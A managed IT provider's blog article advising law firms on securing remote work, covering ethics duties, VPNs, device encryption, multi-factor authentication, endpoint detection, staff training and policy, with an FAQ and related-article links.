Remote Work Security for Legal Professionals

by Jon Lober | NOC Technology

Protecting Client Data Outside the Office

Your paralegal is reviewing case files from a coffee shop. A partner is finishing a brief from their home office. An associate is taking a client call from an airport lounge. Remote and hybrid work isn't a pandemic holdover anymore; it's how law firms operate in 2026. But every location outside your office is a potential exposure point for client data, and the ethics rules don't care where you're sitting when a breach happens.


The ABA Model Rules require lawyers to take "competent and reasonable measures" to safeguard client information. That obligation follows your team wherever they work. When 20% of law firms experienced a cyberattack in the past year–with 39% of those incidents resulting in data loss or exposure–remote work security isn't optional. It's the foundation of ethical practice.


Here's what your firm needs to consider when attorneys and staff work outside the office.


The Ethics Obligation Doesn't Change With Your Location


Missouri attorneys, like their counterparts across the country, have an ethical duty to understand and implement reasonable cybersecurity measures. This isn't buried in some obscure guidance; it's built into the rules governing competent representation. Rule 1.1 requires technological competence. Rule 1.6 requires reasonable efforts to prevent unauthorized disclosure. Rule 1.15 extends protection to client property, including digital files.


When your team works remotely, these obligations get harder to meet. You can't control the network security at someone's home. You can't verify that the coffee shop WiFi isn't being monitored. You can't physically see whether someone's screen is visible to strangers. But the bar doesn't accept "they were working from home" as an excuse when client data gets exposed.


The practical implication: your firm needs documented policies and technical controls that travel with your people. If an attorney can access case files from anywhere, your security posture needs to protect those files everywhere.


Home Networks Are Not Enterprise Networks


Most residential internet setups were designed for streaming movies, not handling privileged legal communications. The average home network runs on a consumer-grade router with default settings, no network segmentation, and whatever devices the household happens to own–smart TVs, gaming consoles, kids' tablets, IoT devices with known vulnerabilities.


When an attorney connects their work laptop to that network, they're sharing bandwidth and potentially exposure with every other device in the house. A compromised smart speaker or an unpatched home computer creates lateral movement opportunities that wouldn't exist in a properly segmented office network.


The solution isn't banning remote work–that ship has sailed. The solution is ensuring that remote connections don't rely on home network security. VPN connections that encrypt all traffic back to your firm's infrastructure, or direct cloud connections with zero-trust verification, remove the home network from your threat model. Your attorney's work traffic never touches their local network in a way that matters.


For firms in the Greater St. Louis area, we've seen this play out repeatedly: a firm assumes their attorneys' home setups are "good enough," then discovers after an incident that someone's compromised home device was the entry point. The technology exists to prevent this. The question is whether your firm has implemented it.


Public WiFi Is Exactly As Dangerous As You've Heard


Yes, HTTPS encrypts website traffic. No, that doesn't make coffee shop WiFi safe for legal work. DNS queries can be monitored. Metadata about what systems you're connecting to is visible. Man-in-the-middle attacks on captive portal networks remain practical. And that assumes the "FreeStarbucksWiFi" network is actually operated by Starbucks and not someone sitting in the corner with a laptop.


The real risk isn't necessarily that an attacker will intercept a specific privileged document in transit. It's that they'll capture credentials, session tokens, or other access materials that let them get into your systems later, from anywhere. One captured authentication cookie could give an attacker the same access to your document management system that your associate has.


The fix is straightforward: never connect to firm resources over public WiFi without a VPN. Better yet, provide cellular hotspots or tethering plans for attorneys who regularly work outside the office. The cost of a mobile data plan is negligible compared to the cost of a breach investigation, client notification, and malpractice exposure.


Device Security Matters More When Devices Travel


A desktop computer in a locked office faces a limited threat profile. A laptop that travels to homes, airports, hotels, and client meetings faces every threat profile. Physical theft, shoulder surfing, loss, and unattended access all become real possibilities.


Full disk encryption is table stakes–if a device is stolen, the data should be unreadable. But encryption only helps if the device is actually locked. Automatic screen locks after brief inactivity (two to five minutes maximum) prevent opportunistic access when an attorney steps away. Remote wipe capabilities let you render a lost device harmless before it becomes a breach.


Equally important is controlling what lives on the device in the first place. If your document management system is cloud-based and attorneys access files through a browser or synced application, a stolen laptop might contain cached copies of recent documents. Policies about local file storage, combined with technical controls that limit offline access, reduce exposure when devices go missing.


Mobile devices compound the challenge. Attorneys read emails, review documents, and communicate with clients from phones and tablets. These devices need the same security controls as laptops: encryption, strong authentication, remote wipe, and managed applications that keep firm data segregated from personal use.


Authentication Is Your First and Last Defense


Passwords alone haven't been adequate for years, and remote work makes their weaknesses more acute. Credential stuffing attacks–where attackers use username/password combinations leaked from other breaches–work just as well whether you're in the office or at home. Phishing attacks designed to capture login credentials can reach attorneys anywhere they check email.


Multi-factor authentication transforms stolen passwords from complete access into useless strings. When your document management system, email, and practice management software all require a second factor (an authenticator app, a hardware key, or a push notification to a registered device), compromised credentials alone can't get attackers in.


The implementation matters. SMS-based codes are better than nothing but vulnerable to SIM swapping attacks. Authenticator apps are stronger. Hardware security keys are strongest. For a small or mid-sized firm in the STL area, authenticator apps hit the practical sweet spot: meaningful security improvement without the logistics of distributing and managing physical tokens.


The critical point is coverage. MFA on your email but not your document management system leaves a gap. MFA on cloud services but not your VPN leaves a gap. Every system that touches client data needs the same authentication rigor.


Endpoint Detection Has Replaced Traditional Antivirus


Traditional antivirus software looks for known malware signatures: patterns that match previously identified threats. That worked when threats evolved slowly and attackers reused the same tools. It doesn't work when AI-generated malware can create unique variants for every target, and when attackers use legitimate system tools to avoid triggering signature-based detection.


Modern endpoint detection and response (EDR) solutions take a different approach. Instead of looking for known bad files, they monitor system behavior for suspicious patterns: unusual process chains, unexpected network connections, attempts to access credential stores, lateral movement between systems. When something looks wrong, they can isolate the affected device before damage spreads.


For remote devices, this monitoring becomes essential. Your IT team (or your managed IT provider) can't watch what's happening on a laptop in someone's living room the way they might notice something odd on the office network. EDR extends that visibility to every managed device, wherever it connects from.


The practical benefit: when an attorney clicks a malicious link in a convincing phishing email (and eventually, someone will), the response can be measured in minutes rather than days. The difference between a contained incident and a reportable breach often comes down to detection speed.


Training Your Team Is Not Optional


Technical controls fail when humans circumvent them. The attorney who finds the VPN slow and connects directly "just this once." The paralegal who emails documents to a personal account to print at home. The staff member who uses the same password everywhere because remembering multiple passwords is annoying.


Regular security awareness training transforms your team from a vulnerability into a defense layer. When everyone understands why the controls exist–not just what the rules are, but what happens when they're ignored–compliance improves. When they can recognize phishing attempts, social engineering calls, and suspicious requests, they become early warning sensors rather than attack vectors.


The training doesn't need to be elaborate. Short, frequent sessions work better than annual marathon presentations that everyone forgets. Simulated phishing exercises identify who needs additional attention. Clear reporting procedures let people raise concerns when something seems wrong.


For Missouri law firms, this training should include state-specific ethics context. When attorneys understand that a security incident isn't just a technical problem but a potential bar complaint, the stakes become personal.


Building a Remote Work Security Policy

Individual controls matter, but they need to connect into a coherent policy that your firm can actually enforce.


Your policy should address:


  • What devices can access firm resources, and what security baselines they must meet
  • Whether personal devices are permitted, and if so, what management and monitoring applies

  • How different types of data should be handled - some matters may warrant stricter controls than others

  • Incident reporting procedures, so security events get escalated rather than hidden


The policy needs buy-in from leadership. When partners ignore security requirements because they find them inconvenient, the message to everyone else is clear. When leadership visibly follows the same rules, compliance becomes cultural.


Document the policy, train on it, and review it annually. Security threats evolve, your firm's technology changes, and what worked two years ago may have gaps today.


What This Looks Like in Practice


A Missouri firm with 15 attorneys and remote work arrangements might implement: managed laptops with full disk encryption and EDR software, VPN or zero-trust network access for all remote connections, MFA on email, document management, and practice management systems, a mobile device management solution for phones and tablets accessing firm email, quarterly security awareness training with monthly phishing simulations, and a documented policy covering all of the above with annual review.


That's not a hypothetical list; it's what firms we work with in the Greater St. Louis area have implemented. The cost is manageable (roughly $150-$250 per user per month depending on scope), and the alternative–hoping nothing bad happens–is increasingly unrealistic given current threat levels.


Conclusion


Remote work security isn't a technology project you finish and forget. It's an ongoing operational requirement driven by your ethical obligations to clients and the practical reality that attackers specifically target law firms for the valuable data they hold. The firms that treat security as foundational–building it into how remote work happens rather than bolting it on afterward–are the ones that avoid becoming breach statistics.


The first step is honest assessment: does your current remote work setup meet your ethics obligations, or are you hoping for the best? If you're not sure, that's the answer.


Curious what proper remote work security costs for a firm your size? We publish our pricing because we think you deserve to know what IT costs before you pick up the phone.

Frequently Asked Questions

Can attorneys ethically work from home on client matters? +
Yes, but only with appropriate security measures in place. The ABA Model Rules require lawyers to take reasonable steps to protect client information regardless of work location. This means implementing controls like VPNs, encrypted devices, and multi-factor authentication that maintain the same security standard you'd have in the office.
What's the biggest remote work security risk for law firms? +
Credential theft remains the primary threat. Attackers use phishing emails and compromised websites to capture login credentials, then use those credentials to access firm systems from anywhere. Multi-factor authentication is the most effective control because it makes stolen passwords useless without the second factor.
Should our firm allow attorneys to use personal devices for work? +
It depends on your risk tolerance and your ability to manage those devices. Personal devices accessing client data should have minimum security requirements (encryption, screen locks, remote wipe capability) and ideally run mobile device management software that keeps firm data segregated. Many St. Louis firms find it simpler to provide firm-owned devices with consistent security baselines.
How often should we train staff on remote work security? +
Short, frequent training works better than annual marathons. Most firms see better results with quarterly focused sessions (15-30 minutes) supplemented by monthly phishing simulations. This keeps security awareness current without overwhelming staff or becoming background noise they tune out.
Is a VPN necessary if we use cloud-based practice management software? +
VPNs and cloud security serve different purposes. Cloud applications with strong authentication protect data in transit to those specific services. A VPN protects all traffic from a device, including connections to on-premise systems, internal resources, and services that might not have their own encryption. For most firms, both make sense as complementary controls.
What should we do if a remote employee's laptop is stolen? +
Immediately trigger remote wipe if that capability is configured. Reset all passwords for accounts accessible from that device. Review access logs to determine what data might have been cached locally. Document the incident for potential ethics reporting requirements. If the device contained unencrypted client data, you may have notification obligations depending on the matter type.
How much does proper remote work security cost for a small law firm? +
For a firm with 10-25 users, comprehensive remote work security (managed devices, EDR, VPN or zero-trust access, MFA, training) typically runs $150-$250 per user per month through a managed IT provider. That includes the technology, monitoring, and support. The cost scales down per-user as firm size increases due to shared infrastructure costs.

Does Microsoft Backup Your OneDrive?

By Jon Lober April 17, 2026
Does Microsoft backup your OneDrive? Learn what's protected, what's not, and why St. Louis SMBs need third-party backup for Microsoft 365 data.

Microsoft 365 Backup

By Jon Lober April 9, 2026
Learn why Microsoft says you're responsible for your own M365 data. Native tools have limits. Greater St. Louis businesses need third-party backup protection.

OneDrive for Business

By Jon Lober April 8, 2026
Is 1TB per user enough OneDrive storage? Honest breakdown of real-world usage, what counts against your limit, and strategies for St. Louis businesses.
More Articles